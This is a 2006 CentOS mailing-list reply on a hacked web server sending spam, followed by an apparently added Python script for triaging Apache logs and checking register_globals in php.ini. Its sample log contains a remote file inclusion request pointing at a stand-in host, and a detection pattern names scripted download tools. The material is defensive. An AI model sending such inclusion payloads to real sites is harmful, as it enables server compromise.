centos-bounces at centos.org <> scribbled on Thursday, June 22, 2006 12:21 PM:

> Jason Bradley Nance wrote:
>>> My question is why is this happening? Obviously it's some apache
>>> exploit.
>>
>> I wouldn't jump to the conclusion that it's an Apache exploit. It's
>> more likely to be an issue with an insecure script assuming they are
>> even coming in through the web server.
>
> Meaning an insecure PHP form or the like? Any general words of wisdom
> on how to ensure my PHP forms are secure? I'm more than happy to read
> up on this, but I just haven't found any material that seems to
> describe my problem.
>
>> A few questions:
>>
>> 1) What makes you think this is an Apache issue?
>
> All the files are owned by user apache and the perl process that is
> sending the spam is running as user apache. I know this could be
> faked if the hacker has root access, but I don't think that is the
> case.
>
>> 2) What other services are running on the box?
>
> I have three open ports: SSH, HTTPD and IMAP (running on a
> nonstandard port).
>
>> 3) How did you clean up after the first hack?
>
> Killed the process, removed the files. Used RPM to verify the
> integrity of all the binaries on the system.
>
>> 4) Are you sure that a user account hasn't been cracked?
>
> Again, I don't think so, but it's very hard to prove a negative, that
> is, it's very hard to prove that you haven't been hacked. I check all
> the usual things such as the last log; again, if they have root they
> can hide this from me, but I don't think that's the case.
>
>> 5) Do you allow root logins via ssh?
>
> Absolutely not.
>
> http://lists.centos.org/mailman/listinfo/centos

One thing I would make sure of is that register_globals = Off is set in
/etc/php.ini.

Looking through your apache logs, as someone else suggested, should help
you find which php script was exploited.

Mike
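The two checks Mike suggests (confirm register_globals is really Off in php.ini, and read the Apache access log to see which PHP script took the hit) can be scripted. The block below is an added example written for this page, not code from anyone in the thread. The log lines, IP addresses and php.ini fragments are constructed for illustration; the heuristics it applies (a URL inside a query-string value, which is how register_globals-style remote file inclusion was usually driven; a scripted user agent such as libwww-perl; a burst of POSTs to one script from one client) are common patterns, not evidence about the original poster's server.

```python
import re
from collections import Counter

# Constructed Apache "combined" format log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [22/Jun/2006:11:58:01 -0500] "GET /index.php?page=about HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
203.0.113.7 - - [22/Jun/2006:11:58:09 -0500] "GET /index.php?page=http://198.51.100.9/x.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
198.51.100.23 - - [22/Jun/2006:12:01:44 -0500] "POST /contact.php HTTP/1.1" 200 301 "http://example.org/contact.php" "Mozilla/4.0"
198.51.100.23 - - [22/Jun/2006:12:01:45 -0500] "POST /contact.php HTTP/1.1" 200 301 "-" "Mozilla/4.0"
198.51.100.23 - - [22/Jun/2006:12:01:46 -0500] "POST /contact.php HTTP/1.1" 200 301 "-" "Mozilla/4.0"
192.0.2.14 - - [22/Jun/2006:12:05:10 -0500] "GET /images/logo.png HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
"""

# Constructed php.ini fragments: one with the unsafe setting, one with the
# directive commented out and then set correctly.
SAMPLE_INI_BAD = """\
; constructed fragment
register_globals = On
"""
SAMPLE_INI_GOOD = """\
; register_globals = On   <- commented out, must not count
register_globals = Off
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)
# A query-string value that is itself a URL: the classic remote file
# inclusion shape (?page=http://attacker/shell.txt?).
RFI_RE = re.compile(r'=(?:https?|ftp)://', re.IGNORECASE)
SCRIPTED_UA_RE = re.compile(r'libwww-perl|curl|wget|python-urllib', re.IGNORECASE)
INI_DIRECTIVE_RE = re.compile(r'^register_globals\s*=\s*("?)([^";\s]*)\1', re.IGNORECASE)


def parse_log(text):
    """Parse combined-format lines into dicts; lines that don't match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def php_targets(entries):
    """Count requests per .php script (query string stripped)."""
    counts = Counter()
    for e in entries:
        script = e['path'].split('?', 1)[0]
        if script.endswith('.php'):
            counts[script] += 1
    return counts


def suspicious_requests(entries, post_threshold=3):
    """Return (ip, path, reason) tuples for requests worth a closer look."""
    flagged = []
    posts = Counter()
    for e in entries:
        script = e['path'].split('?', 1)[0]
        if RFI_RE.search(e['path']):
            flagged.append((e['ip'], e['path'], 'remote URL in query string (RFI attempt)'))
        if SCRIPTED_UA_RE.search(e['ua']) or e['ua'] in ('', '-'):
            flagged.append((e['ip'], e['path'], 'scripted user agent: ' + (e['ua'] or '(empty)')))
        if e['method'] == 'POST' and script.endswith('.php'):
            posts[(e['ip'], script)] += 1
    for (ip, script), n in posts.items():
        if n >= post_threshold:
            flagged.append((ip, script, '%d POSTs to one script from one client' % n))
    return flagged


def register_globals_off(ini_text):
    """True only if the effective (last uncommented) register_globals value is off.

    A missing directive returns False on purpose: the compiled-in default
    depends on the PHP version, so the safe setting should be explicit.
    PHP treats "", 0, off, no, false and none as boolean false.
    """
    setting = None
    for line in ini_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith(';'):
            continue
        m = INI_DIRECTIVE_RE.match(stripped)
        if m:
            setting = m.group(2).lower()   # last occurrence wins, as in PHP
    return setting in ('', '0', 'off', 'no', 'false', 'none')


if __name__ == '__main__':
    entries = parse_log(SAMPLE_LOG)
    print('PHP scripts hit:', php_targets(entries).most_common())
    for ip, path, reason in suspicious_requests(entries):
        print('%-15s %-45s %s' % (ip, path, reason))
    print('php.ini (bad) register_globals off?', register_globals_off(SAMPLE_INI_BAD))
    print('php.ini (good) register_globals off?', register_globals_off(SAMPLE_INI_GOOD))
```

On a real box, feed `parse_log` the contents of /var/log/httpd/access_log (and the rotated copies covering the time the perl process appeared) and `register_globals_off` the contents of /etc/php.ini; a script that shows up both in the flagged list and near the top of `php_targets` is the one to read first.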